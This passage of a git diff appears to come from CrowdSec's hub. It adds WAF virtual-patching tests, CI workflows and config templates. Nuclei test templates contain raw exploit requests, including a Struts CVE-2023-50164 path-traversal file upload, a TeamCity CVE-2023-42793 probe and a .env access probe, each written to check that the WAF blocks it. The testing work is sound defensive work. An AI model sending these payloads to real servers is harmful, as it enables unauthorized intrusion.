+      Content-Length: 593
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Disposition: form-data; name="upload"; filename="poc.txt"
+      Content-Type: text/plain
+      
+      test
+      
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Disposition: form-data; name="uPlOadFiLeNamE";
+      
+      ../../poc.txt
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip--
+    - |
+      POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
+      Host: {{Hostname}}
+      Accept-Language: en-US,en;q=0.9
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+      Accept-Encoding: gzip, deflate, br
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Length: 593
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+      Content-Disposition: form-data; name="upload"; filename="poc.txt"
+      Content-Type: text/plain
+      
+      test
+      
+      
+      ------WebKitFormBoundary5WJ61X4PRwyYKlip
+
+    cookie-reuse: true
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 403'
+        - 'status_code_3 == 403'
diff --git a/.appsec-tests/CVE-2023-50164/config.yaml b/.appsec-tests/CVE-2023-50164/config.yaml
new file mode 100644
index 00000000000..3bac2e3a4b7
--- /dev/null
+++ b/.appsec-tests/CVE-2023-50164/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
+nuclei_template: CVE-2023-50164.yaml
diff --git a/.appsec-tests/cve-2023-42793/config.yaml b/.appsec-tests/cve-2023-42793/config.yaml
new file mode 100644
index 00000000000..0f351751bcf
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
+nuclei_template: cve-2023-42793.yaml
diff --git a/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
new file mode 100644
index 00000000000..ce0505da035
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
@@ -0,0 +1,22 @@
+id: cve-2023-42793
+info:
+  name: cve-2023-42793
+  author: crowdsec
+  severity: medium
+  description: |
+    cve-2023-42793 testing
+  tags: appsec-testing
+
+http:
+  - raw:
+      - |
+        GET /rpc2 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+      - type: status
+        status:
+          - 403
+
diff --git a/.appsec-tests/template_acquis.yaml b/.appsec-tests/template_acquis.yaml
new file mode 100644
index 00000000000..5aba47f6dbb
--- /dev/null
+++ b/.appsec-tests/template_acquis.yaml
@@ -0,0 +1,7 @@
+listen_addr: 127.0.0.1:4241
+source: appsec
+log_level: debug
+labels:
+  type: appsec
+#appsec_config: appsec-test
+appsec_config_path: ./runtime/appsec-configs/config.yaml
\ No newline at end of file
diff --git a/.appsec-tests/template_appsec-profile.yaml b/.appsec-tests/template_appsec-profile.yaml
new file mode 100644
index 00000000000..f0f976df3b6
--- /dev/null
+++ b/.appsec-tests/template_appsec-profile.yaml
@@ -0,0 +1,5 @@
+name: appsec-test
+log_level: debug
+inband_rules:
+ - "crowdsecurity/*" # all rules
+default_remediation: ban
diff --git a/.appsec-tests/template_config.yaml b/.appsec-tests/template_config.yaml
new file mode 100644
index 00000000000..c443955ecab
--- /dev/null
+++ b/.appsec-tests/template_config.yaml
@@ -0,0 +1,48 @@
+common:
+  daemonize: false
+  pid_dir: ./runtime
+  log_media: file
+  log_level: info
+  log_dir: ./runtime/log/
+  working_dir: .
+config_paths:
+  config_dir: ./runtime/
+  data_dir: ./runtime/data/
+  simulation_path: ./runtime/simulation.yaml
+  hub_dir: ./runtime/hub/
+  index_path: ./runtime/hub/.index.json
+  notification_dir: ./runtime/notifications/
+  plugin_dir: /usr/local/lib/crowdsec/plugins/
+crowdsec_service:
+  parser_routines: 1
+  acquisition_path: ./runtime/acquis.yaml
+cscli:
+  output: human
+db_config:
+  log_level: info
+  type: sqlite
+  db_path: ./runtime/data/crowdsec.db
+  #user: 
+  #password:
+  #db_name:
+  #host:
+  #port:
+  flush:
+    max_items: 5000
+    max_age: 7d
+plugin_config:
+  user: nobody # plugin process would be ran on behalf of this user
+  group: nogroup # plugin process would be ran on behalf of this group
+api:
+  client:
+    insecure_skip_verify: false
+    credentials_path: ./runtime/local_api_credentials.yaml
+  server:
+    log_level: info
+    listen_uri: 127.0.0.1:8181
+    profiles_path: ./runtime/profiles.yaml
+prometheus:
+  enabled: true
+  level: full
+  listen_addr: 127.0.0.1
+  listen_port: 6060
diff --git a/.appsec-tests/template_profiles.yaml b/.appsec-tests/template_profiles.yaml
new file mode 100644
index 00000000000..ad917ff252d
--- /dev/null
+++ b/.appsec-tests/template_profiles.yaml
@@ -0,0 +1,13 @@
+name: default_ip_remediation
+#debug: true
+filters:
+ - Alert.Remediation == true && Alert.GetScope() == "Ip"
+decisions:
+ - type: ban
+   duration: 4h
+# notifications:
+#   - slack_default  # Set the webhook in /etc/crowdsec/notifications/slack.yaml before enabling this.
+#   - splunk_default # Set the splunk url and token in /etc/crowdsec/notifications/splunk.yaml  before enabling this.
+#   - http_default # Set the required http parameters in  /etc/crowdsec/notifications/http.yaml before enabling this.
+on_success: break
+
diff --git a/.appsec-tests/template_simulation.yaml b/.appsec-tests/template_simulation.yaml
new file mode 100644
index 00000000000..e9c68999350
--- /dev/null
+++ b/.appsec-tests/template_simulation.yaml
@@ -0,0 +1,4 @@
+simulation: off
+# exclusions:
+#  - crowdsecurity/ssh-bf
+ 
\ No newline at end of file
diff --git a/.appsec-tests/vpatch-env-access/config.yaml b/.appsec-tests/vpatch-env-access/config.yaml
new file mode 100644
index 00000000000..e6bc95b6212
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-env-access.yaml
+nuclei_template: vpatch-env-access.yaml
diff --git a/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
new file mode 100755
index 00000000000..65e84701967
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
@@ -0,0 +1,24 @@
+id: vpatch-env-access
+info:
+  name: vpatch-env-access
+  author: crowdsec
+  severity: info
+  description: vpatch-env-access testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      GET /foo/bar/.env HTTP/1.1
+      Host: {{Hostname}}
+    - |
+      GET /foo/bar/ HTTP/1.1
+      Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 404'
diff --git a/.github/workflows/appsec_vpatch_lint.yaml b/.github/workflows/appsec_vpatch_lint.yaml
new file mode 100644
index 00000000000..35560902077
--- /dev/null
+++ b/.github/workflows/appsec_vpatch_lint.yaml
@@ -0,0 +1,40 @@
+name: Vpatch collection lint
+on:
+  push:
+    paths:
+      - "appsec-rules/**.yaml"
+      - "appsec-rules/**.yml"
+      - "scripts/**.py"
+      - ".github/workflows/appsec_vpatch_lint.yaml"
+      - "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+
+jobs:
+  update-taxonomy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/setup-python@v4
+        with:
+          python-version: "3.10"
+      - uses: actions/checkout@v1
+      - name: Get changed files
+        run: |
+          changed_files=$(git diff-tree --no-commit-id --name-only -r $GITHUB_SHA | tr '\n' ',' | sed 's/,$/\n/')
+          echo "changed_files=${changed_files}" >> $GITHUB_ENV
+      - name: Create local changes
+        env:
+          AUTHOR: ${{ github.actor }}
+        run: |
+          pip install requests pyyaml mdutils
+          python ./scripts/appsec_vpatch_lint.py -e appsec_vpatch_cve_error.md --hub ./
+          [ -f "appsec_vpatch_cve_error.md" ] && echo "taxonomy_errors=1" >> $GITHUB_ENV || echo "taxonomy_errors=0" >> $GITHUB_ENV
+      - uses: jwalton/gh-find-current-pr@v1
+        id: findPr
+        with:
+          state: open
+      - name: Comment PR if errors
+        if: ${{ (env.taxonomy_errors == '1') && (github.event_name == 'push') && (github.ref != 'refs/heads/master') }}
+        uses: thollander/actions-comment-pull-request@v2
+        with:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          filePath: appsec_vpatch_cve_error.md
+          pr_number: ${{ steps.findPr.outputs.pr }}
diff --git a/.github/workflows/test_appsec_rules.yaml b/.github/workflows/test_appsec_rules.yaml
new file mode 100644
index 00000000000..6770b320e2d
--- /dev/null
+++ b/.github/workflows/test_appsec_rules.yaml
@@ -0,0 +1,76 @@
+name: Appsec Rules Tests
+on:
+  pull_request:
+    branches: [ master ]
+    paths:
+      - 'appsec-configs/**.yaml'
+      - 'appsec-configs/**.yml'
+      - 'appsec-rules/**.yaml'
+      - 'appsec-rules/**.yml'
+      - '.github/workflows/test_appsec_rules.yaml'
+      - '.appsec-tests/**'
+  push:
+    branches: [ master ]
+    paths:
+      - 'appsec-configs/**.yaml'
+      - 'appsec-configs/**.yml'
+      - 'appsec-rules/**.yaml'
+      - 'appsec-rules/**.yml'
+      - '.github/workflows/test_appsec_rules.yaml'
+      - '.appsec-tests/**'
+
+jobs:
+  run-hub-tests:
+    runs-on: ubuntu-20.04
+    steps:
+    - name: Check out code into the Go module directory
+      uses: actions/checkout@v4
+    - uses: actions/setup-go@v4
+      with:
+        go-version: '1.21'
+    - name: Install requirements
+      run: |
+        sudo apt install libre2-dev
+        go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
+    - name: Install CrowdSec
+      run: |
+        git clone https://github.com/crowdsecurity/crowdsec.git
+        cd crowdsec
+        BUILD_STATIC=1 make release
+        cd crowdsec-v*
+        sudo ./wizard.sh --unattended
+    - name: Install NGINX
+      run: |
+        sudo apt install nginx
+    - name: Install CrowdSec NGINX Bouncer
+      run: |
+        git clone https://github.com/crowdsecurity/cs-nginx-bouncer.git
+        cd cs-nginx-bouncer/
+        make release
+        tar xzvf crowdsec-nginx-bouncer.tgz
+        cd crowdsec-nginx-bouncer-v*
+        sudo ./install.sh -y
+    - name: Setup NGINX Bouncer API key
+      run: |
+        sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
+        sudo sed -i 's/API_KEY=.*$/API_KEY=this_is_a_bad_password/' /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+        echo "APPSEC_URL=http://127.0.0.1:4241" | sudo tee -a /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+        sudo systemctl restart nginx
+    - name: run tests on last crowdsec tag
+      run: |
+        cscli hubtest run --all --appsec --debug
+        echo "APPSEC_RULE_COV=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2)" >> $GITHUB_ENV
+        APPSEC_RULE_COV_NUMBER=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2 | tr -d '%' | tr -d '[[:space:]]')
+        echo "APPSEC_RULE_BADGE_COLOR=$(if [ "$APPSEC_RULE_COV_NUMBER" -lt "70" ]; then echo 'red'; else echo 'green'; fi)" >> $GITHUB_ENV
+    - name: Create appsec badge
+      uses: schneegans/dynamic-badges-action@v1.1.0
+      #if: ${{ github.ref == 'refs/heads/master' }}
+      if: false
+      with:
+        auth: ${{ secrets.GIST_BADGES_SECRET }}
+        gistID: ${{ secrets.GIST_BADGES_ID }}
+        filename: hub_appsec_badge.json
+        label: Hub Appsec
+        message: ${{ env.APPSEC_RULE_COV }}
+        color: ${{ env.APPSEC_RULE_BADGE_COLOR }}
+
diff --git a/.github/workflows/update-index.yml b/.github/workflows/update-index.yml
index 3fc0a5c7beb..5154deb5d86 100644
--- a/.github/workflows/update-index.yml
+++ b/.github/workflows/update-index.yml
@@ -3,21 +3,26 @@ name: Update index
 on:
   push:
     paths:
-      - "scenarios/**.yaml"
-      - "parsers/**.yaml"
-      - "postoverflows/**.yaml"
-      - "collections/**.yaml"
-      - "scenarios/**.yml"
-      - "parsers/**.yml"
-      - "postoverflows/**.yml"
-      - "collections/**.yml"
-      - "scenarios/**.md"
-      - "parsers/**.md"
-      - "postoverflows/**.md"
-      - "collections/**.md"
-      - ".github/workflows/update-index.yml"
+      - 'scenarios/**.yaml'
+      - 'parsers/**.yaml'
+      - 'postoverflows/**.yaml'
+      - 'collections/**.yaml'
+      - 'appsec-rules/**.yaml'
+      - 'appsec-configs/**.yaml'
+      - 'scenarios/**.yml'
+      - 'parsers/**.yml'
+      - 'postoverflows/**.yml'
+      - 'collections/**.yml'
+      - 'appsec-rules/**.yml'
+      - 'appsec-configs/**.yml'
+      - 'scenarios/**.md'
+      - 'parsers/**.md'
+      - 'postoverflows/**.md'
+      - 'collections/**.md'
+      - 'appsec-rules/**.md'
+      - 'appsec-configs/**.md'
+      - '.github/workflows/update-index.yml'
       - "*.go"
-
 jobs:
   build:
     runs-on: ubuntu-latest
diff --git a/.github/workflows/update_taxonomy.yaml b/.github/workflows/update_taxonomy.yaml
index 5c989451ae9..4a3b83ceeda 100644
--- a/.github/workflows/update_taxonomy.yaml
+++ b/.github/workflows/update_taxonomy.yaml
@@ -5,6 +5,8 @@ on:
     paths:
       - "scenarios/**.yaml"
       - "scenarios/**.yml"
+      - "appsec-rules/**.yaml"
+      - "appsec-rules/**.yml"
       - "scripts/**.py"
       - ".github/workflows/update_taxonomy.yaml"
       - "scripts/.scenariosignore"
diff --git a/.gitignore b/.gitignore
index cf5d8960d4f..c7ef590bf83 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,6 +8,9 @@
 .tests/*/parser-dump.yaml
 .tests/*/runtime/*
 
+.appsec-tests/*/results/*
+.appsec-tests/*/runtime/*
+
 ## tmp files
 taxonomy/scenario_taxonomy_errors.md
 
diff --git a/.index.json b/.index.json
index 863d7aec119..cefc43764ea 100644
--- a/.index.json
+++ b/.index.json
@@ -1,4 +1,717 @@
 {
+ "appsec-configs": {
+  "crowdsecurity/crs": {
+   "path": "appsec-configs/crowdsecurity/crs.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "e9cbc67cae76d60468e40f54db62c97157e203bc06c412239695c843ef98f987",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "fd41693ebf881d1cb561cd6a163c9da47c50c480829efe4ddca74f6ec3847855",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9jcnMKZGVmYXVsdF9yZW1lZGlhdGlvbjogYmFuCiNsb2dfbGV2ZWw6IGRlYnVnCm91dG9mYmFuZF9ydWxlczoKIC0gY3Jvd2RzZWN1cml0eS9jcnM=",
+   "author": "crowdsecurity",
+   "labels": null
+  },
+  "crowdsecurity/virtual-patching": {
+   "path": "appsec-configs/crowdsecurity/virtual-patching.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "48a765ded560cf4d8bb405e563411245156b6b2c2fef09e5492e6270f5337bff",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "0bf15e1ebed4c94933bf9407d616be22121733ddd327710f7f5b79ec70d52085",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "e93cc5d63aae3a83794b0f6b1e41566f53fae059e6044a9519f02256fa6e2adf",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCmRlZmF1bHRfcmVtZWRpYXRpb246IGJhbgojbG9nX2xldmVsOiBkZWJ1ZwppbmJhbmRfcnVsZXM6CiAtIGNyb3dkc2VjdXJpdHkvYmFzZS1jb25maWcgCiAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLSoKIyBpbmJhbmRfb3B0aW9uczoKIyAgZGlzYWJsZV9ib2R5X2luc3BlY3Rpb246IHRydWUK",
+   "author": "crowdsecurity",
+   "labels": null
+  }
+ },
+ "appsec-rules": {
+  "crowdsecurity/base-config": {
+   "path": "appsec-rules/crowdsecurity/base-config.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "5ef93f4b19a028f2415afaf570df4d20a5f6038fa94cc990a387662303c2ef20",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9iYXNlLWNvbmZpZwojIyMjIFRoaXMgZmlsZSBpcyBpbnRlbmRlZCB0byBwcm92aWRlIGEgYmFzaWMgY29uZmlndXJhdGlvbiBmb3IgY29yYXphOgojIyMjIC0gU2V0IHRoZSBib2R5IHByb2Nlc3NvcnMgYmFzZWQgb24gdGhlIGNvbnRlbnQtdHlwZQoKc2VjbGFuZ19ydWxlczoKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXmFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgImlkOjEwMCxwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9VVJMRU5DT0RFRCIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXm11bHRpcGFydC9mb3JtLWRhdGEiICJpZDoxMDEscGhhc2U6MSxwYXNzLG5vbG9nLG5vYXVkaXRsb2csY3RsOnJlcXVlc3RCb2R5UHJvY2Vzc29yPU1VTFRJUEFSVCIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXmFwcGxpY2F0aW9uL3htbCIgImlkOjEwMixwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9WE1MIgogLSBTZWNydWxlIFJFUVVFU1RfSEVBREVSUzpDb250ZW50LVR5cGUgIkByeCBeYXBwbGljYXRpb24vanNvbiIgImlkOjEwMyxwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9SlNPTiIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXnRleHQveG1sIiAiaWQ6MTA0LHBoYXNlOjEscGFzcyxub2xvZyxub2F1ZGl0bG9nLGN0bDpyZXF1ZXN0Qm9keVByb2Nlc3Nvcj1YTUwiCiAtIFNlY1J1bGUgUkVRQk9EWV9QUk9DRVNTT1IgIiFAcnggKD86VVJMRU5DT0RFRHxNVUxUSVBBUlR8WE1MfEpTT04pIiAiaWQ6MTA1LHBoYXNlOjEscGFzcyxub2xvZyxub2F1ZGl0bG9nLGN0bDpyZXF1ZXN0Qm9keVByb2Nlc3Nvcj1SQVciICNVc2Ugb3VyIGN1c3RvbSBSQVcgYm9keSBwcm9jZXNzb3IsIGp1c3QgdG8gaGF2ZSBSRVFVRVNUX0JPRFkgc2V0Cg==",
+   "author": "crowdsecurity",
+   "labels": null
+  },
+  "crowdsecurity/crs": {
+   "path": "appsec-rules/crowdsecurity/crs.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "786fe3341c0f0a813eb57b7780620181686081e0f181515509290f2e8c042f0b",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "19d216b68b3de8a9c03e4d6644f578520b3673096ef55da6d77bf40902a36cab",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9jcnMKc2VjbGFuZ19ydWxlczoKIC0gU2VjUnVsZUVuZ2luZSBPbgogLSBTZWNSZXF1ZXN0Qm9keUFjY2VzcyBPbgpzZWNsYW5nX2ZpbGVzX3J1bGVzOgogLSBjcnMtc2V0dXAuY29uZgogLSBSRVFVRVNULTkwMS1JTklUSUFMSVpBVElPTi5jb25mCiAtIFJFUVVFU1QtOTA1LUNPTU1PTi1FWENFUFRJT05TLmNvbmYKIC0gUkVRVUVTVC05MTEtTUVUSE9ELUVORk9SQ0VNRU5ULmNvbmYKIC0gUkVRVUVTVC05MTMtU0NBTk5FUi1ERVRFQ1RJT04uY29uZgogLSBSRVFVRVNULTkyMC1QUk9UT0NPTC1FTkZPUkNFTUVOVC5jb25mCiAtIFJFUVVFU1QtOTIxLVBST1RPQ09MLUFUVEFDSy5jb25mCiAtIFJFUVVFU1QtOTIyLU1VTFRJUEFSVC1BVFRBQ0suY29uZgogLSBSRVFVRVNULTkzMC1BUFBMSUNBVElPTi1BVFRBQ0stTEZJLmNvbmYKIC0gUkVRVUVTVC05MzEtQVBQTElDQVRJT04tQVRUQUNLLVJGSS5jb25mCiAtIFJFUVVFU1QtOTMyLUFQUExJQ0FUSU9OLUFUVEFDSy1SQ0UuY29uZgogLSBSRVFVRVNULTkzMy1BUFBMSUNBVElPTi1BVFRBQ0stUEhQLmNvbmYKIC0gUkVRVUVTVC05MzQtQVBQTElDQVRJT04tQVRUQUNLLUdFTkVSSUMuY29uZgogLSBSRVFVRVNULTk0MS1BUFBMSUNBVElPTi1BVFRBQ0stWFNTLmNvbmYKIC0gUkVRVUVTVC05NDItQVBQTElDQVRJT04tQVRUQUNLLVNRTEkuY29uZgogLSBSRVFVRVNULTk0My1BUFBMSUNBVElPTi1BVFRBQ0stU0VTU0lPTi1GSVhBVElPTi5jb25mCiAtIFJFUVVFU1QtOTQ0LUFQUExJQ0FUSU9OLUFUVEFDSy1KQVZBLmNvbmYKIC0gUkVRVUVTVC05NDktQkxPQ0tJTkctRVZBTFVBVElPTi5jb25mCiAtIFJFU1BPTlNFLTk1MC1EQVRBLUxFQUtBR0VTLmNvbmYKIC0gUkVTUE9OU0UtOTUxLURBVEEtTEVBS0FHRVMtU1FMLmNvbmYKIC0gUkVTUE9OU0UtOTUyLURBVEEtTEVBS0FHRVMtSkFWQS5jb25mCiAtIFJFU1BPTlNFLTk1My1EQVRBLUxFQUtBR0VTLVBIUC5jb25mCiAtIFJFU1BPTlNFLTk1NC1EQVRBLUxFQUtBR0VTLUlJUy5jb25mCiAtIFJFU1BPTlNFLTk1NS1XRUItU0hFTExTLmNvbmYKIC0gUkVTUE9OU0UtOTU5LUJMT0NLSU5HLUVWQUxVQVRJT04uY29uZgogLSBSRVNQT05TRS05ODAtQ09SUkVMQVRJT04uY29uZgoKZGF0YToKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9jcnMtc2V0dXAuY29uZgogICAgZGVzdF9maWxlOiBjcnMtc2V0dXAuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVRVUVTVC05MDEtSU5JVElBTElaQVRJT04uY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkwMS1JTklUSUFMSVpBVElPTi5jb25mCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9SRVFVRVNULTkwNS1DT01NT04tRVhDRVBUSU9OUy5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTA1LUNPTU1PTi1FWENFUFRJT05TLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTExLU1FVEhPRC1FTkZPUkNFTUVOVC5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTExLU1FVEhPRC1FTkZPUkNFTUVOVC5jb25mCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9SRVFVRVNULTkxMy1TQ0FOTkVSLURFVEVDVElPTi5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTEzLVNDQU5ORVItREVURUNUSU9OLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTIwLVBST1RPQ09MLUVORk9SQ0VNRU5ULmNvbmYKICAgIGRlc3RfZmlsZTogUkVRVUVTVC05MjAtUFJPVE9DT0wtRU5GT1JDRU1FTlQuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVRVUVTVC05MjEtUFJPVE9DT0wtQVRUQUNLLmNvbmYKICAgIGRlc3RfZmlsZTogUkVRVUVTVC05MjEtUFJPVE9DT0wtQVRUQUNLLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTIyLU1VTFRJUEFSVC1BVFRBQ0suY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkyMi1NVUxUSVBBUlQtQVRUQUNLLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTMwLUFQUExJQ0FUSU9OLUFUVEFDSy1MRkkuY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkzMC1BUFBMSUNBVElPTi1BVFRBQ0stTEZJLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTMxLUFQUExJQ0FUSU9OLUFUVEFDSy1SRkkuY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkzMS1BUFBMSUNBVElPTi1BVFRBQ0stUkZJLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTMyLUFQUExJQ0FUSU9OLUFUVEFDSy1SQ0UuY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkzMi1BUFBMSUNBVElPTi1BVFRBQ0stUkNFLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTMzLUFQUExJQ0FUSU9OLUFUVEFDSy1QSFAuY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTkzMy1BUFBMSUNBVElPTi1BVFRBQ0stUEhQLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTM0LUFQUExJQ0FUSU9OLUFUVEFDSy1HRU5FUklDLmNvbmYKICAgIGRlc3RfZmlsZTogUkVRVUVTVC05MzQtQVBQTElDQVRJT04tQVRUQUNLLUdFTkVSSUMuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVRVUVTVC05NDEtQVBQTElDQVRJT04tQVRUQUNLLVhTUy5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTQxLUFQUExJQ0FUSU9OLUFUVEFDSy1YU1MuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL